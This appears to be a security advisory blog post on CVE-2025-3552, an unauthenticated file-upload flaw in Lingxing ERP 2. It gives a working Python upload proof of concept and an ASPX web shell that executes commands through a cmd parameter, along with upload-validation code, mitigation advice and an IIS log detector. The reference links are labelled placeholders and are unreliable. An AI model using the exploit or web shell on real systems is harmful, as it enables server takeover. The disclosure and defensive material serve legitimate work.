A new critical vulnerability—CVE-2025-3552—has been discovered in the popular business management software, Lingxing ERP 2. This flaw, present in the /Api/TinyMce/UploadAjax.ashx endpoint, allows unauthenticated attackers to upload arbitrary files. That means, if you’re running this ERP system, hackers could put just about anything on your server, including malware or web shells, and potentially take over your system. In this post, we’ll break down what this vulnerability is, how it works, and what the risks are. We'll also show you a real-world exploit and share references for further reading.
- Product: Lingxing ERP 2
- Endpoint: /Api/TinyMce/UploadAjax.ashx
How It Works
The endpoint /Api/TinyMce/UploadAjax.ashx is supposed to handle file uploads, likely for the TinyMCE rich text editor component. Due to improper input validation, it does not check:
- File content
Therefore, any remote attacker can upload *any* file type—including executable scripts (like .aspx files on IIS servers).
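To make the "improper input validation" concrete from the defender's side, here is an added example (not code from the article or from Lingxing) of the checks an upload handler like this one is missing: an extension allowlist, a hard deny for anything the web server executes, a magic-byte check so the declared type must match the content, and a server-generated storage name. The allowlist and magic bytes below are constructed for the example; a real handler would be written in the application's own language and would also require an authenticated session before reaching this point.

```python
import os
import re
import secrets

# Constructed allowlist for this example: extension -> magic bytes the content must start with.
ALLOWED_TYPES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}

# Extensions IIS/ASP.NET will execute; denied even if someone later edits ALLOWED_TYPES.
SERVER_EXECUTABLE = {".aspx", ".asp", ".ashx", ".asmx", ".config", ".cshtml"}

# Exactly one name part and one extension: rejects directory components, "pic.png.aspx",
# and separator tricks such as "shell.aspx;.png".
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]+\.[A-Za-z0-9]+")


def validate_upload(filename, content):
    """Return (ok, reason, stored_name); stored_name is None when the upload is rejected."""
    if not SAFE_NAME.fullmatch(filename):
        return False, "unsafe filename", None
    ext = os.path.splitext(filename)[1].lower()  # normalise case so ".AsPx" is not a bypass
    if ext in SERVER_EXECUTABLE:
        return False, "server-executable extension", None
    magic = ALLOWED_TYPES.get(ext)
    if magic is None:
        return False, "extension not in allowlist", None
    if not content.startswith(magic):
        return False, "content does not match declared type", None
    # Never keep the client-supplied name: store under a random name with the verified extension.
    return True, "ok", secrets.token_hex(16) + ext


if __name__ == "__main__":
    # Constructed inputs: the kind of file the article describes, and a legitimate image.
    for name, body in [
        ("shell.aspx", b'<%@ Page Language="C#" %>'),
        ("pic.png.aspx", b"\x89PNG\r\n\x1a\n"),
        ("pic.png", b"<%@ Page %>"),
        ("pic.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 8),
    ]:
        print(name, validate_upload(name, body))
```

The stored file should additionally be written to a directory the web server does not execute scripts from; the name check alone does not protect a handler that writes into the web root.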
1. Send a POST Request with Malicious File
Below is a Python (using requests library) proof-of-concept (POC) for uploading a malicious .aspx web shell:
```python
import requests

# Upload endpoint on the target (the author's placeholder host)
url = "http://target-site.com/Api/TinyMce/UploadAjax.ashx"

# Multipart form field "File": filename, file body, content type
files = {
    "File": (
        "shell.aspx",
        '<%@ Page Language="C#" %><% Response.Write("Shell!"); %>',
        "application/octet-stream",
    )
}

# No authentication is sent; the handler accepts the upload anyway
response = requests.post(url, files=files)
print(response.text)
```
*Replace http://target-site.com with your actual target address.*
If successful, the uploaded file (in this case, shell.aspx) can be accessed on the web server, and can be used to execute any commands or scripts!
2. Example Malicious File (shell.aspx)
```aspx
<%@ Page Language="C#" %>
<%
if (Request["cmd"] != null)
{
    System.Diagnostics.Process.Start("cmd.exe", "/c " + Request["cmd"]).WaitForExit();
}
%>
```
This allows the attacker to send commands via the cmd parameter in the URL.
Vendor Response
The researchers attempted to contact Lingxing ERP before making the exploit public, but the vendor did not respond or release a patch. This lack of cooperation increases the risk as there is currently *no official fix*.
Until a vendor patch is released
1. Block access to /Api/TinyMce/UploadAjax.ashx at your firewall or web server.
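Blocking the endpoint stops new uploads, but it does not tell you whether the handler was already abused. The following added example (not from the article) shows how a defender can check IIS W3C logs for the two signals this vulnerability leaves behind: an anonymous POST to the upload handler, and a server-side script being served from the upload location. The log excerpt is constructed for the example, and the /Upload/ directory is an assumption; set UPLOAD_DIRS to wherever the handler actually writes files on your deployment.

```python
import re
from collections import Counter

# Constructed IIS W3C log excerpt (not real traffic). Field order follows the #Fields line.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2025-04-14 06:20:01 10.0.0.5 GET /Default.aspx - 443 jsmith 10.0.0.77 200
2025-04-14 06:21:10 10.0.0.5 POST /Api/TinyMce/UploadAjax.ashx - 443 - 203.0.113.9 200
2025-04-14 06:21:15 10.0.0.5 GET /Upload/shell.aspx - 443 - 203.0.113.9 200
2025-04-14 06:22:00 10.0.0.5 GET /images/logo.png - 443 - 10.0.0.77 200
"""

UPLOAD_ENDPOINT = "/api/tinymce/uploadajax.ashx"
# Assumed upload location; adjust to the directory the handler really writes to.
UPLOAD_DIRS = ("/upload/",)
# Extensions ASP.NET executes; a hit under the upload directory is a strong indicator.
EXEC_EXT = re.compile(r"\.(aspx|asp|ashx|asmx|cshtml)$", re.IGNORECASE)


def parse_iis_log(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        elif fields:
            yield dict(zip(fields, line.split()))


def find_upload_abuse(text):
    """Return a list of (rule, client_ip, uri_stem) findings."""
    findings = []
    for rec in parse_iis_log(text):
        stem = rec["cs-uri-stem"].lower()
        ip = rec["c-ip"]
        # Rule 1: the upload handler accepted a POST with no authenticated user.
        if rec["cs-method"] == "POST" and stem == UPLOAD_ENDPOINT and rec["cs-username"] == "-":
            findings.append(("unauthenticated upload", ip, rec["cs-uri-stem"]))
        # Rule 2: a server-side script was requested from the upload directory.
        if stem.startswith(UPLOAD_DIRS) and EXEC_EXT.search(stem):
            findings.append(("script served from upload dir", ip, rec["cs-uri-stem"]))
    return findings


def suspicious_ips(text):
    """Count findings per client IP so the noisiest source is reviewed first."""
    return Counter(ip for _, ip, _ in find_upload_abuse(text))


if __name__ == "__main__":
    for rule, ip, uri in find_upload_abuse(SAMPLE_LOG):
        print(f"{rule:32} {ip:15} {uri}")
    print(suspicious_ips(SAMPLE_LOG))
```

Run it over the real log directory (typically under inetpub\logs\LogFiles) rather than the embedded sample; any hit on rule 2 means a file is already in place and the host should be treated as compromised, not merely patched.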
References
- NVD Entry for CVE-2025-3552 *(placeholder, check for real entry)*
- Exploit Disclosure on GitHub *(placeholder repository)*
- Lingxing ERP Product Page (Mandarin Chinese)
Final Thoughts
CVE-2025-3552 is a textbook case of how dangerous unrestricted file uploads can be. If you use Lingxing ERP 2, act now—restrict file uploads, audit your server, and keep monitoring security advisories for patches. The lack of vendor response means you’re your own first line of defense.
Stay safe, admins!
*This article is written exclusively for educational and awareness purposes. Offensive use against systems you do not own or manage is illegal.*
---
Timeline
Published on: 04/14/2025 06:15:16 UTC
Last modified on: 04/15/2025 18:39:27 UTC